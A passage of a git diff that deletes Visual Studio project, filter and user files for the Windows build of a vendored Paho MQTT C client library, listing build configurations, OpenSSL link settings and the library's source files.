-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters
deleted file mode 100644
index 18988cc..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters
+++ /dev/null
@@ -1,79 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj
deleted file mode 100755
index c70676d..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj
+++ /dev/null
@@ -1,204 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{17F07F98-AA5F-4373-9877-992A341D650A}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>pahomqtt3as</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>false</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>false</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\Clients.h" />

-    <ClInclude Include="..\..\src\Heap.h" />

-    <ClInclude Include="..\..\src\LinkedList.h" />

-    <ClInclude Include="..\..\src\Log.h" />

-    <ClInclude Include="..\..\src\Messages.h" />

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-    <ClInclude Include="..\..\src\MQTTPacket.h" />

-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />

-    <ClInclude Include="..\..\src\MQTTPersistence.h" />

-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />

-    <ClInclude Include="..\..\src\MQTTProtocol.h" />

-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />

-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />

-    <ClInclude Include="..\..\src\Socket.h" />

-    <ClInclude Include="..\..\src\SocketBuffer.h" />

-    <ClInclude Include="..\..\src\SSLSocket.h" />

-    <ClInclude Include="..\..\src\StackTrace.h" />

-    <ClInclude Include="..\..\src\Thread.h" />

-    <ClInclude Include="..\..\src\Tree.h" />

-    <ClInclude Include="..\..\src\utf-8.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\Clients.c" />

-    <ClCompile Include="..\..\src\Heap.c" />

-    <ClCompile Include="..\..\src\LinkedList.c" />

-    <ClCompile Include="..\..\src\Log.c" />

-    <ClCompile Include="..\..\src\Messages.c" />

-    <ClCompile Include="..\..\src\MQTTClient.c" />

-    <ClCompile Include="..\..\src\MQTTPacket.c" />

-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />

-    <ClCompile Include="..\..\src\MQTTPersistence.c" />

-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />

-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />

-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />

-    <ClCompile Include="..\..\src\MQTTVersion.c" />

-    <ClCompile Include="..\..\src\Socket.c" />

-    <ClCompile Include="..\..\src\SocketBuffer.c" />

-    <ClCompile Include="..\..\src\SSLSocket.c" />

-    <ClCompile Include="..\..\src\StackTrace.c" />

-    <ClCompile Include="..\..\src\Thread.c" />

-    <ClCompile Include="..\..\src\Tree.c" />

-    <ClCompile Include="..\..\src\utf-8.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters
deleted file mode 100644
index 95f68ae..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters
+++ /dev/null
@@ -1,147 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj
deleted file mode 100644
index a6d8c85..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj
+++ /dev/null
@@ -1,175 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{DFDF6238-DA97-4474-84C2-D313E8B985AE}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>paho-cs-sub</RootNamespace>
-    <ProjectName>paho-cs-sub</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\samples\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug</AdditionalLibraryDirectories>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
